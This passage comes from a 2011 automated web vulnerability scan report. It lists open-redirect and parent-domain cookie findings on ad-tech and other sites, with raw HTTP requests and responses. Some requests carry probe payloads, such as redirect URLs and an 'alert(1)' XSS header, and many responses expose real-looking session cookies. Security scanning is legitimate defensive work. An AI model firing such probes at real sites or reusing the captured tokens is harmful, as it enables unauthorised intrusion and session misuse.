Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C208%2C2%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 02:09:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1; expires=Wed, 01-Jun-2011 02:09:18 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C243%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C; expires=Wed, 01-Jun-2011 02:09:18 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; expires=Sat, 29-Oct-2011 02:09:18 GMT; path=/; domain=.rubiconproject.com
Location: http://ade6906d72fcaf38a/a?http://a.triggit.com/pxruourcm
Content-Length: 0
Content-Type: text/html; charset=UTF-8

15.10. http://s.ixiaa.com/digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif [&redirect parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://s.ixiaa.com
Path:   /digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif

Issue detail

The value of the &redirect request parameter is used to perform an HTTP redirect. The payload http%3a//a88b390374f6600e3/a%3fhttp%3a//tags.bluekai.com/site/3754%3fphint%3dea%25253D%257BEA_value%257D%26phint%3deb%25253D%257BEB_value%257D%26phint%3dec%25253D%257BEC_value%257D%26phint%3ded%25253D%257BED_value%257D%26phint%3dee%25253D%257BEE_value%257D%26ret%3dhtml%26id%3dPARTNER_UUID was submitted in the &redirect parameter. This caused a redirection to the following URL:

Request

GET /digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif?&redirect=http%3a//a88b390374f6600e3/a%3fhttp%3a//tags.bluekai.com/site/3754%3fphint%3dea%25253D%257BEA_value%257D%26phint%3deb%25253D%257BEB_value%257D%26phint%3dec%25253D%257BEC_value%257D%26phint%3ded%25253D%257BED_value%257D%26phint%3dee%25253D%257BEE_value%257D%26ret%3dhtml%26id%3dPARTNER_UUID HTTP/1.1
Host: s.ixiaa.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/3945?ret=html&phint=__bk_t%3DLogin%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=25552944
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx
Date: Mon, 02 May 2011 02:00:14 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Location: http://a88b390374f6600e3/a?http://tags.bluekai.com/site/3754?phint=ea%3DNA&phint=eb%3DNA&phint=ec%3DNA&phint=ed%3DNA&phint=ee%3DNA&ret=html&id=PARTNER_UUID
X-ClientIP: 173.193.214.243
Content-Length: 3

...
15.11. http://sync.mathtag.com/sync/img [redir parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The value of the redir request parameter is used to perform an HTTP redirect. The payload http%3a//a582a8171468fa991/a%3fhttp%3a//ads.adbrite.com/adserver/vdi/684339%3fd%3d[VISITORDATA] was submitted in the redir parameter. This caused a redirection to the following URL:

Request

GET /sync/img?mt_exid=1&type=sync&redir=http%3a//a582a8171468fa991/a%3fhttp%3a//ads.adbrite.com/adserver/vdi/684339%3fd%3d[VISITORDATA] HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: sync.mathtag.com
Cookie: uuid=4d50384b-4b5e-0f67-919a-7275589c0b85; ts=1299605541

Response

HTTP/1.1 302 Found
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-n2a pid 0x6b3e 27454
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 02 May 2011 02:38:08 GMT
Location: http://a582a8171468fa991/a?http://ads.adbrite.com/adserver/vdi/684339?d=uuid%3D4d50384b-4b5e-0f67-919a-7275589c0b85
Etag: 4d50384b-4b5e-0f67-919a-7275589c0b85
Connection: Keep-Alive
Set-Cookie: ts=1304303888; domain=.mathtag.com; path=/; expires=Tue, 01-May-2012 02:38:08 GMT
Content-Length: 0

16. Cookie scoped to parent domain  previous  next
There are 63 instances of this issue:

16.1. http://t.mookie1.com/t/v1/event  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/event

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/event?migClientId=1392&migAction=cntwir_servicefamilyoverview_1&migSource=mig HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:09 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Fri, 25-May-12 23:35:09 GMT; domain=.mookie1.com
Set-Cookie: session=1304292909|1304292909; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;
16.2. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:32:53 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:32:53 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=WXEJ2N3KRNFIDB4U3SIR5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207579474; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=609658d5a1ebcf5618d05b23302f38b7; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.32
Via: 1.1 12.120.78.32:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
16.3. http://www.greenhulk.net/forums/archive/index.php/t-126285.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.greenhulk.net
Path:   /forums/archive/index.php/t-126285.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/archive/index.php/t-126285.html HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 02:03:16 GMT
Server: Apache
Set-Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; path=/; domain=.greenhulk.net; HttpOnly
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:03:16 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:03:16 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Location: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step&s=95336a5715caddfe645c46b8976e18eb
Expires: Mon, 02 May 2011 02:03:16 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 0

16.4. http://www.mylearningplan.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mylearningplan.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylearningplan.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 492
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=%7BB37083AE%2D04D4%2D461A%2DB2D9%2D387A5E72C198%7D; domain=.mylearningplan.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:53:09 GMT

<div id='section_D'>
           <h1><b>Error Message</b></h1>
<div class='alert'>
<p></p>
<p></p>
<p align='center'><strong>Error: An Error Has occurred on this page</strong></p>
<p></p>
<p align='cent
...[SNIP]...
16.5. http://www.ptcb.org/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ptcb.org
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ptcb.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 01 May 2011 23:55:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=4880537;domain=.ptcb.org;expires=Tue, 23-Apr-2041 23:55:51 GMT;path=/
Set-Cookie: CFTOKEN=39658861;domain=.ptcb.org;expires=Tue, 23-Apr-2041 23:55:51 GMT;path=/
location: https://www.ptcb.org//AM/Template.cfm?Section=Home1&WebsiteKey=9d90bd98-be45-4b90-ae8c-25ab71fa0923
Content-Type: text/html; charset=UTF-8

<!-- Source Code Copyright .. 2005 by Advanced Solutions International, Inc. -->
16.6. http://www.washingtonpost.com/wl/jobs/home  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.washingtonpost.com
Path:   /wl/jobs/home

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: text/html; charset=ISO8859_1
Expires: Sun, 01 May 2011 23:32:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:32:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: WashingtonJobsSession=qZrzN9tFJw3JhJnTRRd4t88nZFhtDgPRL1L4JF6PJZZvhvG4smnP!-945584298; domain=.washingtonpost.com; path=/
Content-Length: 35809


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!--Server: jobs3a GUID:f823c81588328017643c787765c5da54 Sun May 01 19:32:53 EDT 2011-->
<head>
<title>
   
       
...[SNIP]...
16.7. http://0.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://0.r.msn.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?ld=4v-pZZqp5PXPxPr2jYxibkwwnB-22O5wIuL9Rzhh78fqUZESO-SNAN1I0p1RZh9VzMKmHl3T_uqiCOJ5FNzwIPuGT5pPBglXL7vsTpG3rmBi8JPX-kGW7cmavEn8vLA8ZUpDfgXYfYMzbr2_h_RClpMCw5bbyCsdCJ-ZAvL8O210BJOjVSygfjXf7m9NrUvzuY_8Hk0eCy2RfmsNjjtsHfYlbjsqqMmQfQuSowlRNdr8M1VAlMMdO-vpb2zhIfHpI866llWxAmY3M9V1EGQfR9Js8RDB7fndDI9tUiQv3sCRfiAXJX94SMuOw HTTP/1.1
Host: 0.r.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; countrycode=US; zipcode=75207; Sample=37; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 302 Object Moved
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://clk.atdmt.com/CNT/go/319741851/direct/01/
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Server: Microsoft-IIS/6.0
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MSAnalytics=4vfdfecb2d4c0fa370b4247c7f5ca890fe255a7ff3f2d9c16df515059ba889a2c264247fc67cd3b686d59a9dba96fa20d5fcc7df8948e35cc9d47b74a8b87c97eb3554094c90fb1ce99e4b9ec8be3846abbf8e7ed010; expires=Wed, 15 Jun 2011 23:32:50 GMT; domain=.r.msn.com; path=/; httponly
Date: Sun, 01 May 2011 23:32:50 GMT
Connection: close
Content-Length: 191

<HTML>
<HEAD><TITLE>Document moved</TITLE></HEAD>
<BODY><H1>Object Moved</H1>This document may be found <A HREF="http://clk.atdmt.com/CNT/go/319741851/direct/01/">here</A>
</BODY>
</HTML>
16.8. http://a.triggit.com/px  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.triggit.com
Path:   /px

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /px?cb=s7l8ya&i=CAEQAiiybjINamFwYW5hdG9yLmNvbUABShhUYjRQT3dBQkt5VUsyaUpMSU1sNHlnPT1Qu5747QRd4XoEQGAAcg8xNzMuMTkzLjIxNC4yNDN4AIABvhmKARUvZWxlcGhhbnQvbG9naW4ucGh0bWw=&gwp=Tb4POwABKyUK2iJLIMl4yvxpGNYmaYG7q1B5DA HTTP/1.1
Host: a.triggit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trgu=c1e1301e-3a1f-4ca7-9870-f636b5f10e66

Response

HTTP/1.1 302 Found
Set-Cookie: trgs=382922425; domain=.triggit.com; path=/;
Location: http://tag.admeld.com/match?admeld_adprovider_id=310&external_user_id=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=ogo3ps
Date: Mon, 02 May 2011 02:00:25 GMT
Content-Length: 11
Content-Type: text/html; charset=ISO-8859-1

Redirecting
16.9. http://ab-m.d.chango.com/m/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ab-m.d.chango.com
Path:   /m/ab

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/ab HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ab-m.d.chango.com

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: Chango RTB Server
Location: http://ads.adbrite.com/adserver/vdi/806205?d=3728e74c-7461-11e0-9185-00259009a9e4&r=http%3A//d.chango.com/m/s/AdBrite%3Fpartner_uid%3D
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Set-Cookie: _t=3728e74c-7461-11e0-9185-00259009a9e4; Domain=chango.com; expires=Thu, 29 Apr 2021 02:09:30 GMT; Path=/
Connection: close

16.10. http://ad.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=7 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.turn.com
Cookie: uid=3207951335209607633; rrs=undefined%7C2%7C3%7Cundefined%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7Cundefined%7C1004; rds=undefined%7C15013%7C15013%7Cundefined%7Cundefined%7C15013%7C15013%7C15013%7C15013%7C15013%7C15013%7C15013%7Cundefined%7C15013; rv=1; pf=_90PbWHCfHQmA1ivIIw5G4EMKdh5ityF6sgfR1rZxdwyIhcl0EGWggtbGC91oY8VKc-gdz7WzBmsN9YXs4uSIOzqBFjueX7aZwnvRhcSBs3iaWve_wv63PKco4w-BWK9o8OpL6FMs5ncMADcj7HCCZOL681iuOj2kWoOE2k1qPBfidfcs42JZlIwUalAHVDrgEz_nvLc-cdbQ5JtcKrDVQ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3207951335209607633; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:09:28 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:09:28 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3207951335209607633&rnd=6934683957726833621&fpid=7&nu=n&t=
...[SNIP]...
16.11. http://admeld.adnxs.com/usersync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYAiACKAIw447n7QQQ447n7QQYAQ..; anj=Kfw))ByDuq(FJl:c9U(O<@CeVOmEXW1hL>#/*4Jn(uor=(5EBh5<W.k)Y><WiS:LOiybjU0r>wWIql]AvGq/IdS!acC(FaP$cYJ!J#h1Y$?7kmw?YIqgimiBWWi-dkyfpjFRO44ek(e!)zV^HsoI@m5(lVJ]-z44hi<@/+Gxw$#QV%Etka*a%eva$=@Au!AJSu6uj*@oO@]EL5n0EQo`R]:t/`eU_45K!c^VKH`O2$i'@`s.wMV-wH9)D=aab*.arK7xs@L$@.CbO?Kb?0ZuKR(FN+u4M#Er2:Iua<E_XvS:>yEy6m-9JBYXUm+V1/.@>oBLAQ/P^+8=*EjA[(GADvf*BbS#E1e?YTKA$'LPYDp0.fkASgZh0i(^P[N`AV7o.$d3BYa-u[VwBx:I(G/:381kcgHWoswb:=`Ku>u@Cidi%Y$u9`qSJ<7rlOS'j/U/>:p6qkC9x[=9>gzl!f)'vJRUdB!F`KgLFB[sgim_V^-4E!hC:TT[Mnnesvth<EqmD]T6X<+EXw*eL#7V._]eR7wKz#+Q<jY0)9m4.Ux(+g2x6gtKj2Uf7bK$d-7jQI=`H%cII=9QVL!LY6%gg!la[qizZ#JNdA3x'%jK#?C9j?>vs79'K>b2_7w$cAnjrNM]; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:10:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 31-Jul-2011 02:10:32 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 02:10:32 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');
16.12. http://ads.adbrite.com/adserver/behavioral-data/8201  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/8201?d=1031 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
